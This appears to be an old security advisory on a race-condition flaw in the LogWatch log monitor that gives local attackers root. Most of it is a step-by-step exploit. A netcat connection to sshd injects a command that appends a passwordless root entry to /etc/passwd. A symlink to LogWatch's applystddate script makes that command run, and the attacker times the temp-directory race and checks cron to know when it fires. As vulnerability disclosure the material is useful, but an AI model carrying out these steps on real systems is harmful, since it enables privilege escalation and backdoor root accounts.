|
|
|
|
| |
| LogWatch is a customizable, pluggable log-monitoring system. It will go through your logs for a given period and make a report in the areas that you wish with the detail that you wish. Easy to use - works right out of the package on almost all systems. A race condition in the product can be used by local attackers to gain root privileges. The following is an explanation on how to exploit the vulnerability through the SSH daemon (and FTPd). |
| |
Credit:
The information has been provided by ano nym.
|
| |
Here are some ideas about exploiting the race condition in LogWatch.
First, we need a way to smuggle in a command in to /var/log/secure, this is how we can do it:
$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.
$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:@>>/etc/passwd #' from 127.0.0.1
Ok, now we got a the command we want, how are we going to get this executed?
----- This is what logwatch does.
Preprocessing LogFile: secure /bin/cat /var/log/secure 2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6
(The command string should be inserted the day BEFORE, if range is yesteday...)
So, if we create a symbolic link:
ln -s /etc/log.d/scripts/shared/applystddate secure
For example, the command will be executed when logwatch calls applystddate next time (many other targets exist, for example /root/.bashrc etc).
We can of course use other logs than secure; for example "messages" and smuggle in the command using the FTPd.
So, what are the problems?:
[code from LogWatch]
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";
if ( -d $TempDir ) {
rmdir ($TempDir);
}
if ( -e $TempDir ) {
unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
print "\nMaking Temp Dir: " . $TempDir . "\n";
}
mkdir ($TempDir,0700);
[code from LogWatch]
We need to create the directory logwatch.PID before "mkdir ($TempDir,0700);" and after/before #### 1. If not we will not be able to create a symbolic link inside the directory (0700).
Another nice thing is that we can see when LogWatch will be executed, by looking at /etc/crontab - logwatch is in the dir /etc/cron.daily.
(02 4 * * * root run-parts /etc/cron.daily)
|
|
|
|
|
